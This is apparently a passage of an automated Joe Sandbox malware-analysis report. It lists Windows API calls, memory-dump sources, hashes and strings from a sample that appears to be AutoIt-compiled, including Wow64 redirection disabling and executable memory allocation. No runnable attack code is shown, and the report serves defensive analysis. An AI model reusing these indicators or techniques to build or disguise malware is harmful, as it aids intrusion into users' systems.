                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0033F910,00000000,?,?,?,?), ref: 003379DF
                                                                                                                    • GetWindowLongW.USER32 ref: 003379FC
                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00337A0C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Long
                                                                                                                    • String ID: SysTreeView32
                                                                                                                    • API String ID: 847901565-1698111956
                                                                                                                    • Opcode ID: b0fe67f96e9220c9054a7842d850357a9d1692974e88490a80383013b94e3ad9
                                                                                                                    • Instruction ID: 6f859daf09b34ef47c9864e74e98c72dfb780745be0bacf17e418f17c15f9bd0
                                                                                                                    • Opcode Fuzzy Hash: b0fe67f96e9220c9054a7842d850357a9d1692974e88490a80383013b94e3ad9
                                                                                                                    • Instruction Fuzzy Hash: FF31CF71604206AFDB268E38DC81BEA77A9EF05324F218725F875A32E0D731ED618B50
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00337461
                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00337475
                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00337499
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window
                                                                                                                    • String ID: SysMonthCal32
                                                                                                                    • API String ID: 2326795674-1439706946
                                                                                                                    • Opcode ID: 862623aad15f077f0c191525ebbf58cc81db12e059b5ed875c1a30e62603af1d
                                                                                                                    • Instruction ID: 4401d3b4b4bc91dd2d5500ca284164aa87e260b64c5d8cf4ca75c5aa7f86e873
                                                                                                                    • Opcode Fuzzy Hash: 862623aad15f077f0c191525ebbf58cc81db12e059b5ed875c1a30e62603af1d
                                                                                                                    • Instruction Fuzzy Hash: E621D372500218AFDF268F55CC86FEA3B69EF48724F120214FE556B1D0DA75BC90CBA0
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00337C4A
                                                                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00337C58
                                                                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00337C5F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$DestroyWindow
                                                                                                                    • String ID: msctls_updown32
                                                                                                                    • API String ID: 4014797782-2298589950
                                                                                                                    • Opcode ID: a34ccd8b922462f29a3a8e353063d3c7873208893b0113e77c687f2f9aac0121
                                                                                                                    • Instruction ID: 51c21ec7431ac8ec7d7c30a61b3e77caea1a3e16cd028edc9eb08759f43e1a86
                                                                                                                    • Opcode Fuzzy Hash: a34ccd8b922462f29a3a8e353063d3c7873208893b0113e77c687f2f9aac0121
                                                                                                                    • Instruction Fuzzy Hash: 60218EB5604209AFDB22DF24DCC1DA737ECEF4A3A4F550059FA059B3A1CB71EC518A60
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00336D3B
                                                                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00336D4B
                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00336D70
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$MoveWindow
                                                                                                                    • String ID: Listbox
                                                                                                                    • API String ID: 3315199576-2633736733
                                                                                                                    • Opcode ID: ddfa07ff37c70b5c9e7a768f1d456b71f333be3c2e7c60780c5fa23d571d8562
                                                                                                                    • Instruction ID: 541d7e8ec1441916d1cd97c265395be2acf3dd44d6c9dde571638af1755dc120
                                                                                                                    • Opcode Fuzzy Hash: ddfa07ff37c70b5c9e7a768f1d456b71f333be3c2e7c60780c5fa23d571d8562
                                                                                                                    • Instruction Fuzzy Hash: 95215032610118BFEF168F54DC86EAB3BAEEB89750F51C128FA459B1A0C6719C519BA0
                                                                                                                    APIs
                                                                                                                    • __snwprintf.LIBCMT ref: 00323A66
                                                                                                                      • Part of subcall function 002B7DE1: _memmove.LIBCMT ref: 002B7E22
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __snwprintf_memmove
                                                                                                                    • String ID: , $$AUTOITCALLVARIABLE%d$%4
                                                                                                                    • API String ID: 3506404897-4045604893
                                                                                                                    • Opcode ID: c0c574cae269a6a2d97a76235a1fdad52760cbd60b8b3245ee91d9f6f58cd915
                                                                                                                    • Instruction ID: 5fa922a508349572e8c3c4c809f820e0f22fa40adc4ea168a66f759ed2dd060e
                                                                                                                    • Opcode Fuzzy Hash: c0c574cae269a6a2d97a76235a1fdad52760cbd60b8b3245ee91d9f6f58cd915
                                                                                                                    • Instruction Fuzzy Hash: 19219330A10119AFCF12EF64DC82EEE77B9AF48340F404469F555AB185DB34EA55CF61
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00337772
                                                                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00337787
                                                                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00337794
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend
                                                                                                                    • String ID: msctls_trackbar32
                                                                                                                    • API String ID: 3850602802-1010561917
                                                                                                                    • Opcode ID: 30efdd242f70211bd5f68a362f2ad1bf3f2dc8bd0882863b919b8545791292ac
                                                                                                                    • Instruction ID: 655edf281cfa9eb8806618a8d71d7f206b31f449c1bd1a73f6986e6505221a7c
                                                                                                                    • Opcode Fuzzy Hash: 30efdd242f70211bd5f68a362f2ad1bf3f2dc8bd0882863b919b8545791292ac
                                                                                                                    • Instruction Fuzzy Hash: 20113A72200208BFEF355F60CC41FE7776CEF89B54F024118F64196090C272E811CB10
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __calloc_crt
                                                                                                                    • String ID: 6$@B7
                                                                                                                    • API String ID: 3494438863-1161358885
                                                                                                                    • Opcode ID: 0f1858a5d69d5155ba0b0d624fbb9fb422f45fa8686f1262fa371a4ae77c6e8a
                                                                                                                    • Instruction ID: 6009eabde4a23363e85c6ea13d0cc4b2ec9f9ce61d050199e2df95a09db85571
                                                                                                                    • Opcode Fuzzy Hash: 0f1858a5d69d5155ba0b0d624fbb9fb422f45fa8686f1262fa371a4ae77c6e8a
                                                                                                                    • Instruction Fuzzy Hash: 56F06879628A128BF7798F69BC55B566799E700734F500817E104EE391FBF08CD5CAC4
                                                                                                                    APIs
                                                                                                                    • __lock.LIBCMT ref: 002D9B94
                                                                                                                      • Part of subcall function 002D9C0B: __mtinitlocknum.LIBCMT ref: 002D9C1D
                                                                                                                      • Part of subcall function 002D9C0B: EnterCriticalSection.KERNEL32(00000000,?,002D9A7C,0000000D), ref: 002D9C36
                                                                                                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 002D9BA4
                                                                                                                      • Part of subcall function 002D9100: ___addlocaleref.LIBCMT ref: 002D911C
                                                                                                                      • Part of subcall function 002D9100: ___removelocaleref.LIBCMT ref: 002D9127
                                                                                                                      • Part of subcall function 002D9100: ___freetlocinfo.LIBCMT ref: 002D913B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
                                                                                                                    • String ID: 86$86
                                                                                                                    • API String ID: 547918592-4260956243
                                                                                                                    • Opcode ID: 2b3cf9a8a3736bf4c5156167610713d384d55932904609a840633c088a8358d1
                                                                                                                    • Instruction ID: ed952468dcd14b71a3d07d0021f32599f29d61b7907f710928dd3bae0c47ac3e
                                                                                                                    • Opcode Fuzzy Hash: 2b3cf9a8a3736bf4c5156167610713d384d55932904609a840633c088a8358d1
                                                                                                                    • Instruction Fuzzy Hash: 72E08C3596B301AAEA12FBA46903B9C26549B00B35F30815BF089663C5CDF50C95CE1B
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,002B4B83,?), ref: 002B4C44
                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 002B4C56
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                    • API String ID: 2574300362-1355242751
                                                                                                                    • Opcode ID: ecfc182f9d98e7f330dc83b0c2229404b5103647bc74269682186d93d6bea496
                                                                                                                    • Instruction ID: 046534c31e76e34d12f1d47f4c4034aff53d93eaafa2ddcd17ed8b7c48074357
                                                                                                                    • Opcode Fuzzy Hash: ecfc182f9d98e7f330dc83b0c2229404b5103647bc74269682186d93d6bea496
                                                                                                                    • Instruction Fuzzy Hash: FED01270D10713CFD7216F31D98968677D8AF05791F51C83AD997D6165E670D480C650
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,002B4BD0,?,002B4DEF,?,003752F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 002B4C11
                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 002B4C23
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                    • API String ID: 2574300362-3689287502
                                                                                                                    • Opcode ID: 621c09ba51c47320361eb6ff01510f92fd0cf456c0532c882a1b45b2df2902e2
                                                                                                                    • Instruction ID: fedd4e178527a12498ac32fccdde5c77b6f30eb8dc4a5319df9ae6e217f7149f
                                                                                                                    • Opcode Fuzzy Hash: 621c09ba51c47320361eb6ff01510f92fd0cf456c0532c882a1b45b2df2902e2
                                                                                                                    • Instruction Fuzzy Hash: 40D0EC70911713CFD7216F71D988686BAD9AF09B91F51883AD886D6161E6B0D4808650
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00331039), ref: 00330DF5
                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00330E07
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                    • API String ID: 2574300362-4033151799
                                                                                                                    • Opcode ID: 183f2a249ed6797f230d5acec495e625139697d5b3fb8926e2ab6d0c1cef9924
                                                                                                                    • Instruction ID: b89276d6d17be6b68794ca36ec9e2c479d95dfe85090dc41182b2e87be9b7051
                                                                                                                    • Opcode Fuzzy Hash: 183f2a249ed6797f230d5acec495e625139697d5b3fb8926e2ab6d0c1cef9924
                                                                                                                    • Instruction Fuzzy Hash: 38D0C730A00B23CFC7268F72D888383B2E8AF02342F02CC3ED582C2160E6B0D890CA40
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00328CF4,?,0033F910), ref: 003290EE
                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00329100
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                    • API String ID: 2574300362-199464113
                                                                                                                    • Opcode ID: 6dca49fbb01d9e1f973e87e1f522635ba781e58d19bf320911b0883f95941ec4
                                                                                                                    • Instruction ID: 7ab9fa631fadc12498da9d2c4ffa4acb2dbfd548c08eb5baba511b6a3cc984be
                                                                                                                    • Opcode Fuzzy Hash: 6dca49fbb01d9e1f973e87e1f522635ba781e58d19bf320911b0883f95941ec4
                                                                                                                    • Instruction Fuzzy Hash: E6D01774D50723CFDB229F32E898646B6E8AF15351F53C83AD886D65A4EA70D880CA90
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LocalTime__swprintf
                                                                                                                    • String ID: %.3d$WIN_XPe
                                                                                                                    • API String ID: 2070861257-2409531811
                                                                                                                    • Opcode ID: c8a3c51dd080324c037f5c44e54ebbef2d668e2684bac7f260c6bea1750e08c6
                                                                                                                    • Instruction ID: 0e81d9964d42ce5093635c289a8df4aea5dd8ddabf86a6e3783abd5557055e14
                                                                                                                    • Opcode Fuzzy Hash: c8a3c51dd080324c037f5c44e54ebbef2d668e2684bac7f260c6bea1750e08c6
                                                                                                                    • Instruction Fuzzy Hash: B1D01271C3410CEAC705A7919989CF9F37CAB19391FA00472F60AD2040E3B29B74DA21
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2a761b91e7726c5a93b929b05180a17ff3bc0ffa7182655dfe7f3883b7dcbf8c
                                                                                                                    • Instruction ID: 56142b598f2fb5a1ff28e77a0ef87b56fab18c51c50d683807f938cf2b36bffd
                                                                                                                    • Opcode Fuzzy Hash: 2a761b91e7726c5a93b929b05180a17ff3bc0ffa7182655dfe7f3883b7dcbf8c
                                                                                                                    • Instruction Fuzzy Hash: 1DC19F74E05216EFDB15CFA5C894EAEBBB9FF48300B158598E805EB291D730ED81DB90
                                                                                                                    APIs
                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 0032E0BE
                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 0032E101
                                                                                                                      • Part of subcall function 0032D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0032D7C5
                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0032E301
                                                                                                                    • _memmove.LIBCMT ref: 0032E314
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3659485706-0
                                                                                                                    • Opcode ID: 8f5483d65f5d3593e12e9fd0e06e7c537b0e824620a3cba2840a23e11bde292f
                                                                                                                    • Instruction ID: 085f78a09dd75fe3cc5247ee3cd13424988296796d9f12428d55d92d80b5e7c4
                                                                                                                    • Opcode Fuzzy Hash: 8f5483d65f5d3593e12e9fd0e06e7c537b0e824620a3cba2840a23e11bde292f
                                                                                                                    • Instruction Fuzzy Hash: 5FC156716083119FC705DF28C481A6ABBE4FF89354F14896EF89A9B351D730E946CF82
                                                                                                                    APIs
                                                                                                                    • CoInitialize.OLE32(00000000), ref: 003280C3
                                                                                                                    • CoUninitialize.OLE32 ref: 003280CE
                                                                                                                      • Part of subcall function 0030D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0030D5D4
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 003280D9
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 003283AA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 780911581-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
